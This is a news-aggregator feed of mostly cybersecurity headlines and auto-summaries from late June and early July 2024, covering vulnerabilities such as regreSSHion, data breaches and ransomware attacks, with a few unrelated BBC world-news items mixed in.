          2024-07-02 https://www.bleepingcomputer.com/news/security/google-now-pays-250-000-for-kvm-zero-day-vulnerabilities/
          Google has launched kvmCTF, a new vulnerability reward program (VRP) first announced in October 2023 to improve the security of the Kernel-based Virtual Machine (KVM) hypervisor that comes with $250,000 bounties for full VM escape exploits. [...] "

          Autosummary: Full VM escape: $250,000; Arbitrary memory write: $100,000; Arbitrary memory read: $50,000; Relative memory write: $50,000; Denial of service: $20,000; Relative memory read: $10,000. The kvmCTF infrastructure is hosted on Google's Bare Metal Solution (BMS) environment, highlighting the program's commitment to high-security standards. "


          Patelco shuts down banking systems following ransomware attack

          financial exploits ransomware Telcos
          2024-07-02 https://www.bleepingcomputer.com/news/security/patelco-shuts-down-banking-systems-following-ransomware-attack/
          Patelco Credit Union has disclosed it experienced a ransomware attack that led to the proactive shutdown of several of its customer-facing banking systems to contain the incident's impact. [...] "

          Autosummary: It offers a wide range of financial services, including checking and savings accounts, loans, credit cards, investment services, and insurance plans. "


          Affirm says cardholders impacted by Evolve Bank data breach

          financial
          2024-07-02 https://www.bleepingcomputer.com/news/security/affirm-says-cardholders-impacted-by-evolve-bank-data-breach/
          Buy now, pay later loan company Affirm is warning that holders of its payment cards had their personal information exposed due to a data breach at its third-party issuer, Evolve Bank & Trust (Evolve). [...] "

          Autosummary: "On June 25, 2024, Evolve Bank & Trust ("Evolve"), the third-party issuer of the Affirm Card, notified Affirm (the Company) that Evolve had experienced a cybersecurity incident whereby a third party gained unauthorized access to personal information and financial information ("Personal Information") of Evolve retail banking customers and the customers of its financial technology partners," reads the 8-K filing. "


          Evolve Bank data breach impacted fintech firms Wise and Affirm

          financial
          2024-07-02 https://securityaffairs.com/165130/cyber-crime/evolve-bank-data-breach-impacted-wise-affirm.html
          Fintech firms Wise and Affirm confirmed they were both impacted by the recent data breach suffered by Evolve Bank. Fintech companies Wise and Affirm have confirmed that they were both affected by the recent data breach at Evolve Bank. At the end of June, the LockBit gang announced that it had breached the systems of the Federal […] "

          Autosummary: “On June 25, 2024, Evolve Bank & Trust (“Evolve”), the third-party issuer of the Affirm Card, notified the Company that Evolve had experienced a cybersecurity incident whereby a third party gained unauthorized access to personal information and financial information (“Personal Information”) of Evolve retail banking customers and the customers of its financial technology partners.” Wise was sharing data with Evolve Bank & Trust to receive USD account details from the bank, including name, address, date of birth, contact details, SSN or EIN for US customers, or another identity document number for non-US customers. "


          Router maker's support portal hacked, replies with MetaMask phishing

          financial
          2024-07-01 https://www.bleepingcomputer.com/news/security/router-makers-support-portal-hacked-replies-with-metamask-phishing/
          BleepingComputer has verified that the helpdesk portal of a router manufacturer is currently sending MetaMask phishing emails in response to newly filed support tickets, in what appears to be a compromise. [...] "

          Autosummary: Abuses userinfo part of a URL to look real: The phishing link included in the email (defanged for your safety) has a rather interesting structure: hxxps://metamask.io:login@zpr[.]io/x4hFSxCxEqcd. Contrary to how the URL appears, it's not leading you to "metamask.io", but zpr[.]io instead. The Canadian router manufacturer Mercku provides equipment to Canadian and European Internet Service Providers (ISPs) and networking companies including Start.ca, FibreStream, Innsys, RealNett, Orion Telekom, and Kelcom. "


          Threat actors actively exploit D-Link DIR-859 router flaw CVE-2024-0769

          exploits
          2024-07-01 https://securityaffairs.com/165045/hacking/d-link-dir-859-actively-exploited.html
          Experts spotted threat actors exploiting the critical vulnerability CVE-2024-0769, which affects all D-Link DIR-859 WiFi routers. Researchers from cybersecurity firm GreyNoise have spotted exploitation attempts for the critical vulnerability CVE-2024-0769 (CVSS score 9.8) impacting all D-Link DIR-859 WiFi routers. The vulnerability is a path traversal issue that can lead to information disclosure. Threat actors are exploiting the […] "

          Autosummary: Threat actors actively exploit D-Link DIR-859 router flaw CVE-2024-0769 Pierluigi Paganini July 01, 2024 Experts spotted threat actors exploiting the critical vulnerability CVE-2024-0769, which affects all D-Link DIR-859 WiFi routers. "


          New regreSSHion OpenSSH RCE bug gives root on Linux servers

          exploits Linux
          2024-07-01 https://www.bleepingcomputer.com/news/security/new-regresshion-openssh-rce-bug-gives-root-on-linux-servers/
          A new OpenSSH unauthenticated remote code execution (RCE) vulnerability dubbed "regreSSHion" gives root privileges on glibc-based Linux systems. [...] "

          Autosummary: "This vulnerability, if exploited, could lead to full system compromise where an attacker can execute arbitrary code with the highest privileges, resulting in a complete system takeover, installation of malware, data manipulation, and the creation of backdoors for persistent access. "


          Indian Software Firm's Products Hacked to Spread Data-Stealing Malware

          exploits
          2024-07-01 https://thehackernews.com/2024/07/indian-software-firms-products-hacked.html
          Installers for three different software products developed by an Indian company named Conceptworld have been trojanized to distribute information-stealing malware. The installers correspond to Notezilla, RecentX, and Copywhiz, according to cybersecurity firm Rapid7, which discovered the supply chain compromise on June 18, 2024. The issue has since been remediated by Conceptworld as of June 24 "

          Autosummary: "


          New OpenSSH Vulnerability Could Lead to RCE as Root on Linux Systems

          exploits Linux
          2024-07-01 https://thehackernews.com/2024/07/new-openssh-vulnerability-could-lead-to.html
          OpenSSH maintainers have released security updates to contain a critical security flaw that could result in unauthenticated remote code execution with root privileges in glibc-based Linux systems. The vulnerability has been assigned the CVE identifier CVE-2024-6387. It resides in the OpenSSH server component, also known as sshd, which is designed to listen for connections from any of the client "

          Autosummary: "The vulnerability, which is a signal handler race condition in OpenSSH's server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems," Bharat Jogi, senior director of the threat research unit at Qualys, said in a disclosure published today. "


          Cisco warns of NX-OS zero-day exploited to deploy custom malware

          exploits
          2024-07-01 https://www.bleepingcomputer.com/news/security/cisco-warns-of-nx-os-zero-day-exploited-to-deploy-custom-malware/
          Cisco has patched an NX-OS zero-day exploited in April attacks to install previously unknown malware as root on vulnerable switches. [...] "

          Autosummary: Nexus 3000 Series Switches; Nexus 5500 Platform Switches; Nexus 5600 Platform Switches; Nexus 6000 Series Switches; Nexus 7000 Series Switches; Nexus 9000 Series Switches in standalone NX-OS mode. The security flaw also enables attackers to execute commands without triggering system syslog messages, thus allowing them to conceal signs of compromise on hacked NX-OS devices. "


          Plane diverted to Brazil after turbulence injures 30

          latam
          2024-07-01 https://www.bbc.com/news/articles/c51ygv3lwlro
          The Dreamliner plane was flying from Madrid to Montevideo when the mid-air incident happened. "

          Autosummary: "


          Prudential Financial now says 2.5 million impacted by data breach

          financial
          2024-07-01 https://www.bleepingcomputer.com/news/security/prudential-financial-now-says-25-million-impacted-by-data-breach/
          Prudential Financial, a global financial services company, has revealed that over 2.5 million people had their personal information compromised in a February data breach. [...] "

          Autosummary: "


          Hijacked: How hacked YouTube channels spread scams and malware

          financial exploits
          2024-07-01 https://www.welivesecurity.com/en/scams/hijacked-hacked-youtube-channels-scams-malware/
          Here’s how cybercriminals go after YouTube channels and use them as conduits for fraud – and what you should watch out for when watching videos on the platform "

          Autosummary: (Source: The PC Security Channel.) Just weeks ago, the AhnLab Security Intelligence Center (ASEC) wrote about a growing number of cases where cybercriminals hijack popular YouTube channels, including one with 800,000 subscribers, and exploit them to distribute malware such as RedLine Stealer, Vidar and Lumma Stealer. Report and block suspicious content: Report any suspicious or harmful content, comments, links, or users to YouTube. In another tried-and-tested technique, attackers leverage lists of usernames and passwords from past data breaches to break into existing accounts, relying on the fact that many people reuse passwords across different sites. "


          Hackers exploit critical D-Link DIR-859 router flaw to steal passwords

          exploits
          2024-06-29 https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-d-link-dir-859-router-flaw-to-steal-passwords/
          Hackers are exploiting a critical vulnerability that affects all D-Link DIR-859 WiFi routers to collect account information from the device, including passwords. [...] "

          Autosummary: "


          Meet Brain Cipher — The new ransomware behind Indonesia's data center attack

          exploits ransomware
          2024-06-29 https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/
          The new Brain Cipher ransomware operation has begun targeting organizations worldwide, gaining media attention for a recent attack on Indonesia's temporary National Data Center. [...] "

          Autosummary: Brain Cipher dark web negotiation site (Source: BleepingComputer). New data leak site launched: Like other ransomware operations, Brain Cipher will breach a corporate network and spread laterally to other devices. "


          Infosys McCamish Systems data breach impacted over 6 million people

          financial
          2024-06-29 https://securityaffairs.com/165015/data-breach/infosys-mccamish-systems-data-breach-lockbit.html
          Infosys McCamish Systems (IMS) revealed that the 2023 data breach following the LockBit ransomware attack impacted 6 million individuals. IMS specializes in providing business process outsourcing (BPO) and information technology (IT) services specifically tailored for the insurance and financial services industries. Infosys McCamish Systems (IMS) disclosed the security breach on November 3, 2023, in a filing with […] "

          Autosummary: “IMS is also providing individuals with information on how to place a fraud alert and security freeze on one’s credit file, information on protecting against tax fraud, the contact details for the national credit reporting agencies, information on how to obtain a free credit report, a reminder to remain vigilant for fraud and identity theft by reviewing account statements and monitoring credit reports, and encouragement to contact the Federal Trade Commission, their Attorney General, and law enforcement to report attempted or actual identity theft and fraud.” IMS determined that exposed data includes: Names, Social Security numbers, Medical information, Biometric data, Financial account information, and Passport numbers. "


          Researchers Warn of Flaws in Widely Used Industrial Gas Analysis Equipment

          industry
          2024-06-28 https://thehackernews.com/2024/06/researchers-warn-of-flaws-in-widely.html
          Multiple security flaws have been disclosed in Emerson Rosemount gas chromatographs that could be exploited by malicious actors to obtain sensitive information, induce a denial-of-service (DoS) condition, and even execute arbitrary commands. The flaws impact GC370XA, GC700XA, and GC1500XA and reside in versions 4.1.5 and prior. According to operational technology (OT) security firm Claroty, the "

          Autosummary: "


          8220 Gang Exploits Oracle WebLogic Server Flaws for Cryptocurrency Mining

          exploits
          2024-06-28 https://thehackernews.com/2024/06/8220-gang-exploits-oracle-weblogic.html
          Security researchers have shed more light on the cryptocurrency mining operation conducted by the 8220 Gang by exploiting known security flaws in the Oracle WebLogic Server. "The threat actor employs fileless execution techniques, using DLL reflective and process injection, allowing the malware code to run solely in memory and avoid disk-based detection mechanisms," Trend Micro researchers Ahmed "

          Autosummary: "


          New SnailLoad Attack Exploits Network Latency to Spy on Users' Web Activities

          exploits
          2024-06-28 https://thehackernews.com/2024/06/new-snailload-attack-exploits-network.html
          A group of security researchers from the Graz University of Technology have demonstrated a new side-channel attack known as SnailLoad that could be used to remotely infer a user's web activity. "SnailLoad exploits a bottleneck present on all Internet connections," the researchers said in a study released this week. "This bottleneck influences the latency of network packets, allowing an attacker "

          Autosummary: The hijacking attacks targeting TCP could then be weaponized to poison a victim's HTTP web page or stage denial-of-service (DoS) attacks, per the researchers, who said patches for the vulnerability are being readied by the OpenWrt community as well as router vendors like 360, Huawei, Linksys, Mercury, TP-Link, Ubiquiti, and Xiaomi. "


          Dairy giant Agropur says data breach exposed customer info

          financial
          2024-06-28 https://www.bleepingcomputer.com/news/security/dairy-giant-agropur-says-data-breach-exposed-customer-info/
          Agropur, one of the largest dairy cooperatives in North America, is notifying customers of a data breach after some of its shared online directories were exposed. [...] "

          Autosummary: "


          Ticketmaster sends notifications about recent massive data breach

          financial
          2024-06-28 https://www.bleepingcomputer.com/news/security/ticketmaster-sends-notifications-about-recent-massive-data-breach/
          Ticketmaster has started to notify customers who were impacted by a data breach after hackers stole the company's Snowflake database, containing the data of millions of people. [...] "

          Autosummary: Ticketmaster data sold on a hacking forum Source: BleepingComputer Samples of the data seen by BleepingComputer contained more than just "basic contact information," including full names, email addresses, phone numbers, addresses, hashed credit card details, and payment amounts. "


          TeamViewer links corporate cyberattack to Russian state hackers

          government rusia-ucrania ciber
          2024-06-28 https://www.bleepingcomputer.com/news/security/teamviewer-links-corporate-cyberattack-to-russian-state-hackers/
          RMM software developer TeamViewer says a Russian state-sponsored hacking group known as Midnight Blizzard is believed to be behind a breach of their corporate network this week. [...] "

          Autosummary: "Following best-practice architecture, we have a strong segregation of the Corporate IT, the production environment, and the TeamViewer connectivity platform in place," continues TeamViewer's statement. TeamViewer says they believe their internal corporate network, not their production environment, was breached on Wednesday, June 26, using an employee's credentials. "


          TEMU sued for being “dangerous malware” by Arkansas Attorney General

          exploits
          2024-06-28 https://www.malwarebytes.com/blog/news/2024/06/temu-sued-for-being-dangerous-malware-by-arkansas-attorney-general
          The Arkansas Attorney General filed a lawsuit against webshop Temu for allegedly being dangerous malware which is after personal data. "

          Autosummary: The lawsuit claims that Temu’s app can sneakily access “a user’s camera, specific location, contacts, text messages, documents, and other applications.” "


          GitLab Releases Patch for Critical CI/CD Pipeline Vulnerability and 13 Others

          exploits
          2024-06-28 https://thehackernews.com/2024/06/gitlab-releases-patch-for-critical-cicd.html
          GitLab has released security updates to address 14 security flaws, including one critical vulnerability that could be exploited to run continuous integration and continuous deployment (CI/CD) pipelines as any user. The weaknesses, which affect GitLab Community Edition (CE) and Enterprise Edition (EE), have been addressed in versions 17.1.1, 17.0.3, and 16.11.5. The most severe of the "

          Autosummary: "


          Infosys McCamish says LockBit stole data of 6 million people

          ransomware
          2024-06-28 https://www.bleepingcomputer.com/news/security/infosys-mccamish-says-lockbit-stole-data-of-6-million-people/
          Infosys McCamish Systems (IMS) disclosed that the LockBit ransomware attack it suffered earlier this year impacted sensitive information of more than six million individuals. [...] "

          Autosummary: "


          Russian hackers read the emails you sent us, Microsoft warns more customers

          rusia-ucrania
          2024-06-28 https://www.bitdefender.com/blog/hotforsecurity/russian-hackers-read-your-emails-to-us-microsoft-warns-more-customers/
          More of Microsoft's clients are being warned that emails they exchanged with the company were accessed by Russian hackers who broke into its systems and spied on staff inboxes. Read more in my article on the Hot for Security blog. "

          Autosummary: "This week, we are continuing notifications to customers who corresponded with Microsoft corporate email accounts that were exfiltrated by the Midnight Blizzard threat actor," said a Microsoft spokesperson. "


          Supply-chain ransomware attack cripples thousands of car dealerships

          exploits ransomware
          2024-06-28 https://www.exponential-e.com/blog/supply-chain-ransomware-attack-cripples-thousands-of-car-dealerships
          Car dealerships have been brought to a standstill across the United States after a software provider was hit by a ransomware attack. The attack, believed to be by the BlackSuit ransomware gang, forced CDK Global, makers of a platform widely used by car dealerships to conduct their everyday business, to down its IT systems and data centers. Read more in my article on the Exponential-e blog. "

          Autosummary: "


          Better resilience sees more extorted companies refuse to pay their ransomware attackers

          exploits ransomware
          2024-06-28 https://www.tripwire.com/state-of-security/better-resilience-sees-more-extorted-companies-refuse-pay-their-ransomware
          There's some possibly good news on the ransomware front. Companies are becoming more resilient to attacks, and the ransom payments extorted from businesses by hackers are on a downward trend. Read more in my article on the Tripwire State of Security blog. "

          Autosummary: Furthermore, in 2023, less than one quarter (23%) of all companies submitting claims had paid ransom demands, a decline from previous years. "


          A cyberattack shut down the University Hospital Centre Zagreb in Croatia

          ciber
          2024-06-28 https://securityaffairs.com/165007/hacking/cyberattack-shutdown-university-hospital-centre-zagreb.html
          A cyber attack started targeting the University Hospital Centre Zagreb (KBC Zagreb) on Wednesday night, reported the Croatian Radiotelevision. A cyber attack began targeting the University Hospital Centre Zagreb (KBC Zagreb), the largest Croatian hospital, on Wednesday night, according to a report by Croatian Radiotelevision. The hospital has shut down its IT infrastructure in response […] "

          Autosummary: The hospital did not reveal the type of attack that hit its systems, however, HelpnetSecurity reported that this week a series of DDoS attacks targeted the websites of several Croatian government and financial institutions, including the Ministry of Finance, the Tax Administration, the Croatian National Bank, the Economic Bank of Zagreb, and the Zagreb Stock Exchange. "


          Chinese Cyberspies Employ Ransomware in Attacks for Diversion

          exploits ransomware
          2024-06-27 https://www.bleepingcomputer.com/news/security/chinese-cyberspies-employ-ransomware-in-attacks-for-diversion/
          Cyberespionage groups have been using ransomware as a tactic to make attack attribution more challenging, distract defenders, or for a financial reward as a secondary goal to data theft. [...] "

          Autosummary: The researchers believe that two other attacks, against a government entity in East Asia and an aviation organization in the Indian subcontinent are also the work of ChamelGang, based on the use of known TTPs, publicly available tooling seen in previous engagements, and their custom malware BeaconLoader. "


          New ransomware, infostealers pose growing risk in 2024

          exploits ransomware
          2024-06-27 https://www.helpnetsecurity.com/2024/06/27/malicious-hashes-increase/

          BlackBerry detected and stopped 3.1 million cyberattacks (37,000 per day) in the first quarter of 2024. Between January and March 2024, BlackBerry detected 630,000 malicious hashes, representing a 40% increase from its previous reporting period. 60% of attacks targeting industry were directed at critical infrastructure, including government, healthcare, financial, and communication industries, of which 40% targeted the financial sector. “Each iteration of this report highlights startling new trends: novel malware is growing with no signs … More

          The post New ransomware, infostealers pose growing risk in 2024 appeared first on Help Net Security.

          "

          Autosummary: 60% of attacks targeting industry were directed at critical infrastructure, including government, healthcare, financial, and communication industries, of which 40% targeted the financial sector. "


          75% of new vulnerabilities exploited within 19 days

          exploits
          2024-06-27 https://www.helpnetsecurity.com/2024/06/27/nvd-vulnerabilities/

          Last year alone, over 30,000 new vulnerabilities were published, with a new vulnerability emerging approximately every 17 minutes — averaging 600 new vulnerabilities per week, according to Skybox Security. The report highlights a critical gap in remediation efforts, with the average time to patch exceeding 100 days, contrasted against the finding that 75% of new vulnerabilities are exploited in 19 days or less. These findings underscore the urgent need for continuous exposure management and modern … More

          The post 75% of new vulnerabilities exploited within 19 days appeared first on Help Net Security.

          "

          Autosummary: Last year alone, over 30,000 new vulnerabilities were published, with a new vulnerability emerging approximately every 17 minutes — averaging 600 new vulnerabilities per week, according to Skybox Security. The report highlights a critical gap in remediation efforts, with the average time to patch exceeding 100 days, contrasted against the finding that 75% of new vulnerabilities are exploited in 19 days or less. "


          In pictures: Soldiers stage failed coup in Bolivia

          latam
          2024-06-27 https://www.bbc.com/news/articles/c10l54gj359o
          The leader of the military uprising is in custody following a tumultuous day for the country. "

          Autosummary: "


          PoC exploit for critical Fortra FileCatalyst flaw published (CVE-2024-5276)

          exploits
          2024-06-27 https://www.helpnetsecurity.com/2024/06/27/cve-2024-5276-poc/

          A critical SQL injection vulnerability in Fortra FileCatalyst Workflow (CVE-2024-5276) has been patched; a PoC exploit is already available online. While there’s currently no reports of in-the-wild exploitation, enterprise admins are advised to patch their installations as soon as possible. About CVE-2024-5276 Fortra FileCatalyst is an enterprise software solution for accellerated, UDP-based file transfer of large files. It includes the following components: FileCatalyst Direct (a suite of server and client applications for file transfer) Workflow … More

          The post PoC exploit for critical Fortra FileCatalyst flaw published (CVE-2024-5276) appeared first on Help Net Security.

          "

          Autosummary: "


          US offers $10 million for information on indicted WhisperGate malware suspect

          exploits
          2024-06-27 https://www.helpnetsecurity.com/2024/06/27/10-million-bounty-indicted-whispergate-malware-suspect/

          A federal grand jury in Maryland returned an indictment charging a Russian citizen with conspiracy to hack into and destroy computer systems and data. If convicted, he faces a maximum penalty of five years in prison. The U.S. Department of State’s Rewards for Justice program is offering a reward of up to $10 million for information on his location or his malicious cyberactivity. In advance of the full-scale Russian invasion of Ukraine, targets included Ukrainian … More

          The post US offers $10 million for information on indicted WhisperGate malware suspect appeared first on Help Net Security.

          "

          Autosummary: On Jan. 13, 2022, the Conspirators attacked multiple Ukrainian government networks, including the Ukrainian Ministry of International Affairs, the State Treasury, the Judiciary Administration, the State Portal for Digital Services, the Ministry of Education and Science, the Ministry of Agriculture, the State Service for Food Safety and Consumer Protection, the Ministry of Energy, the Accounting Chamber for Ukraine, the State Emergency Service, the State Forestry Agency, and the Motor Insurance Bureau. "


          Russian National Indicted for Cyber Attacks on Ukraine Before 2022 Invasion

          rusia-ucrania
          2024-06-27 https://thehackernews.com/2024/06/russian-national-indicted-for-cyber.html
          A 22-year-old Russian national has been indicted in the U.S. for his alleged role in staging destructive cyber attacks against Ukraine and its allies in the days leading to Russia's full-blown military invasion of Ukraine in early 2022. Amin Timovich Stigal, the defendant in question, is assessed to be affiliated with the Main Directorate of the General Staff of the Armed Forces of the Russian "

          Autosummary: "From August 5, 2021, through February 3, 2022, the conspirators leveraged the same computer infrastructure they used in the Ukraine-related attacks to probe computers belonging to a federal government agency in Maryland in the same manner as they had initially probed the Ukrainian Government networks," the Justice Department (DoJ) said. "


          Critical SQLi Vulnerability Found in Fortra FileCatalyst Workflow Application

          exploits
          2024-06-27 https://thehackernews.com/2024/06/critical-sqli-vulnerability-found-in.html
          A critical security flaw has been disclosed in Fortra FileCatalyst Workflow that, if left unpatched, could allow an attacker to tamper with the application database. Tracked as CVE-2024-5276, the vulnerability carries a CVSS score of 9.8. It impacts FileCatalyst Workflow versions 5.1.6 Build 135 and earlier. It has been addressed in version 5.1.6 build 139. "An SQL injection vulnerability in "

          Autosummary: "


          New P2Pinfect version delivers miners and ransomware on Redis servers

          exploits ransomware
          2024-06-27 https://securityaffairs.com/164968/malware/p2pinfect-delivers-miners-ransomware-on-redis.html
          Researchers warn that the P2Pinfect worm is targeting Redis servers with ransomware and cryptocurrency mining payloads. Cado Security researchers warned that the P2Pinfect worm is employed in attacks against Redis servers, aimed at deploying both ransomware and cryptocurrency mining payloads. In July 2023, Palo Alto Networks Unit 42 researchers first discovered the P2P worm P2PInfect that targets Redis servers […] "

          Autosummary: “Like the ransomware, the usermode rootkit suffers from a fatal flaw; if the initial access is Redis, it is likely that it will only affect the Redis user as the Redis user is only used to run the Redis server and won’t have access to other users’ home directories,” continues the report. "


          India reviews iPhone factory for "not hiring married women"

          industry
          2024-06-27 https://www.bbc.com/news/articles/cydvp336y3no
          The firm has come under the scanner for allegedly not employing married women at its factory in Tamil Nadu state. "

          Autosummary: "


          Largest Croatian hospital under cyberattack

          ciber
          2024-06-27 https://www.helpnetsecurity.com/2024/06/27/largest-croatian-hospital-under-cyberattack/

          The University Hospital Centre Zagreb (KBC Zagreb) is under cyberattack that started on Wednesday night, the Croatian Radiotelevision has reported. Because of the attack, the hospital has shut down its information system and will be switching parts of it online once they are sure it’s safe to do so. All services are working, but the processing of patients is slower than usual, Milivoj Novak, Assistant Director at the hospital, has said in a press conference. … More

          The post Largest Croatian hospital under cyberattack appeared first on Help Net Security.

          "

          Autosummary: DDoS on Croatian institutions It is currently unknown whether the cyberattack against the hospital involved the deployment of ransomware, and whether it’s connected to yesterday’s DDoS attacks on the websites of several Croatian government and financial institutions: the Ministry of Finance, the Tax Administration, the Croatian National Bank (HNB), the Economic Bank of Zagreb (PBZ), and the Zagreb Stock Exchange (ZSE). "


          Bolivia's failed coup attempt... in 75 seconds

          latam
          2024-06-27 https://www.bbc.com/news/videos/c2e4pv9zdmpo
          It all started when the presidential palace in La Paz was stormed by soldiers. "

          Autosummary: "


          Critical GitLab bug lets attackers run pipelines as any user

          exploits
          2024-06-27 https://www.bleepingcomputer.com/news/security/critical-gitlab-bug-lets-attackers-run-pipelines-as-any-user/
          A critical vulnerability is affecting certain versions of GitLab Community and Enterprise Edition products, which could be exploited to run pipelines as any user. [...] "

          Autosummary: “We strongly recommend that all installations running a version affected by the issues described below are upgraded to the latest version as soon as possible” - GitLab GitLab has addressed the vulnerability by releasing versions 17.1.1, 17.0.3, and 16.11.5, and recommends users to apply the updates as soon as possible. "


          Rust-Based P2PInfect Botnet Evolves with Miner and Ransomware Payloads

          exploits ransomware
          2024-06-27 https://thehackernews.com/2024/06/rust-based-p2pinfect-botnet-evolves.html
          The peer-to-peer malware botnet known as P2PInfect has been found targeting misconfigured Redis servers with ransomware and cryptocurrency miners. The development marks the threat's transition from what appeared to be a dormant botnet with unclear motives to a financially motivated operation. "With its latest updates to the crypto miner, ransomware payload, and rootkit elements, it demonstrates "

          Autosummary: "Remote control is facilitated through installed web shells and NetCat, and given the installation of proxy tools aimed at RDP access, data exfiltration by the threat actors is a distinct possibility," ASEC said, highlighting the use of Behinder, China Chopper, Godzilla, BadPotato, cpolar, and RingQ. It also comes as Fortinet FortiGuard Labs pointed out that botnets such as UNSTABLE, Condi, and Skibidi are abusing legitimate cloud storage and computing services operators to distribute malware payloads and updates to a broad range of devices. "


          CISA adds GeoSolutionsGroup JAI-EXT, Linux Kernel, and Roundcube Webmail bugs to its Known Exploited Vulnerabilities catalog

          exploits Linux
          2024-06-27 https://securityaffairs.com/164982/security/cisa-geosolutionsgroup-jai-ext-linux-kernel-roundcube-webmail-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds GeoSolutionsGroup JAI-EXT, Linux Kernel, and Roundcube Webmail bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: Below are the descriptions of the flaws added to the KEV catalog: According to Binding Operational […] "

          Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2022-24816 (GeoSolutionsGroup JAI-EXT Code Injection Vulnerability), CVE-2022-2586 (Linux Kernel Use-After-Free Vulnerability), and CVE-2020-13965 (Roundcube Webmail Cross-Site Scripting (XSS) Vulnerability). Below are the descriptions of the flaws added to the KEV catalog: GeoServer Flaw CVE-2022-24816 (CVSS score of 9.8) is a code injection issue in the Jai-Ext open source project. "


          U.S. indicts Russian GRU hacker, offers $10 million reward

          rusia-ucrania
          2024-06-27 https://www.bleepingcomputer.com/news/security/us-indicts-russian-gru-hacker-offers-10-million-reward/
          The U.S. indicted Russian national Amin Timovich Stigal for his alleged role in cyberattacks targeting Ukrainian government computer networks in an operation from the Russian foreign military intelligence agency (GRU) prior to invading the country. [...] "

          Autosummary: "You could be eligible for a reward and relocation" - Rewards for Justice If arrested and convicted, Stigal faces a potential maximum sentence of five years in prison for his participation in cyberattacks against Ukraine, the U.S., and other NATO member countries. "


          LockBit group falsely claimed the hack of the Federal Reserve

          ransomware
          2024-06-27 https://securityaffairs.com/164988/cyber-crime/lockbit-has-not-hacked-federal-reserve.html
          The LockBit ransomware group seems to have lied when they announced the hack of the US Federal Reserve. The real victim is the Evolve Bank. The LockBit ransomware group hasn’t hacked the Federal Reserve as it recently claimed; the real victim is the Evolve Bank. Last week, the LockBit gang announced that it had […] "

          Autosummary: The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City, and San Francisco.” "


          Bolivia unrest: Coup or no coup?

          latam
          2024-06-27 https://www.bbc.com/news/articles/ck5gje7gyygo
          Gen Juan José Zúñiga's storming of the presidential palace revives memories of military rule. "

          Autosummary: "


          BlackSuit ransomware gang claims attack on KADOKAWA corporation

          exploits ransomware
          2024-06-27 https://www.bleepingcomputer.com/news/security/blacksuit-ransomware-gang-claims-attack-on-kadokawa-corporation/
          The BlackSuit ransomware gang claimed a recent cyberattack on KADOKAWA corporation and is now threatening to publish stolen data if a ransom is not paid. [...] "

          Autosummary: The threat actors say they'll publish all of the stolen data on July 1 if a ransom is not paid, including contacts, confidential documents, employee data, business plans, and financial data. "


          New Unfurling Hemlock threat actor floods systems with malware

          exploits
          2024-06-27 https://www.bleepingcomputer.com/news/security/new-unfurling-hemlock-threat-actor-floods-systems-with-malware/
          A threat actor tracked as Unfurling Hemlock has been infecting target systems with up to ten pieces of malware at the same time in campaigns that distribute hundreds of thousands of malicious files. [...] "

          Autosummary: In the case of Unfurling Hemlock, KrakenLabs analysts observed the following malware, loaders, and utilities dropped on victims' machines: Redline: A popular stealer malware that extracts sensitive information such as credentials, financial data, and cryptocurrency wallets. From the analyzed samples, the researchers deduced that over half of all Unfurling Hemlock attacks targeted systems in the United States, while relatively high-volume activity was also seen in Germany, Russia, Turkey, India, and Canada. : Operates on the Malware-as-a-Service (MaaS) model, capable of stealing data from numerous browsers and extensions, cryptocurrency wallets, and applications like Steam and Telegram. "


          Cybersecurity jobs available right now: June 26, 2024

          ciber
          2024-06-26 https://www.helpnetsecurity.com/2024/06/26/cybersecurity-jobs-available-right-now-june-26-2024/

          CISO Influx | Indonesia | Remote – View job details As a CISO, you will be responsible for protecting Influx from information security risks through the development, implementation, and maintenance of our security program (policies, procedures, and standards). Cloud Security Engineer Atom | United Kingdom | Remote – View job details As a Cloud Security Engineer, you’ll design, develop and deliver the security model of Atom bank’s cloud environment ensuring that infrastructure, applications, and processes … More

          The post Cybersecurity jobs available right now: June 26, 2024 appeared first on Help Net Security.

          "

          Autosummary: Offensive Security Topic Leader – Offensive Security, Malware, Command and Control (C2) Kyndryl | Germany | On-site – View job details As an Offensive Security Topic Leader – Offensive Security, Malware, Command and Control (C2), you will develop, standardize, and maintain advanced Malware and C2 operations, alongside strategic Red Teaming exercises. Cloud Security Engineer Atom | United Kingdom | Remote – View job details As a Cloud Security Engineer, you’ll design, develop and deliver the security model of Atom bank’s cloud environment ensuring that infrastructure, applications, and processes remain inline with various security standards, legal, regulatory, and industry best practice frameworks. Cybersecurity Engineer – Cloud GM Financial | USA | On-site – View job details The Cybersecurity Engineer – Cloud will be responsible for developing, deploying, monitoring, tuning, evaluating, reporting, and maintaining systems and procedures; and to identify and mitigate threats to the corporate network, corporate assets and corporate users. Penetration Test North America Lead JPMorganChase | USA | On-site – View job details As a Penetration Test North America Lead, design and execute testing and simulations – such as penetration tests, technical controls assessments, cyber exercises, or resiliency simulations, and contribute to the development and refinement of assessment methodologies, tools, and frameworks to ensure alignment with the firm’s strategy and compliance with regulatory requirements. "


          New Medusa Android Trojan Targets Banking Users Across 7 Countries

          financial exploits
          2024-06-26 https://thehackernews.com/2024/06/new-medusa-android-trojan-targets.html
          Cybersecurity researchers have discovered an updated version of an Android banking trojan called Medusa that has been used to target users in Canada, France, Italy, Spain, Turkey, the U.K., and the U.S. The new fraud campaigns, observed in May 2024 and active since July 2023, manifested through five different botnets operated by various affiliates, cybersecurity firm Cleafy said in an analysis "

          Autosummary: Cybersecurity researchers have discovered an updated version of an Android banking trojan called Medusa that has been used to target users in Canada, France, Italy, Spain, Turkey, the U.K., and the U.S. The new fraud campaigns, observed in May 2024 and active since July 2023, manifested through five different botnets operated by various affiliates, cybersecurity firm Cleafy said in an analysis published last week. "


          Snowblind malware abuses Android security feature to bypass security

          exploits
          2024-06-26 https://www.bleepingcomputer.com/news/security/snowblind-malware-abuses-android-security-feature-to-bypass-security/
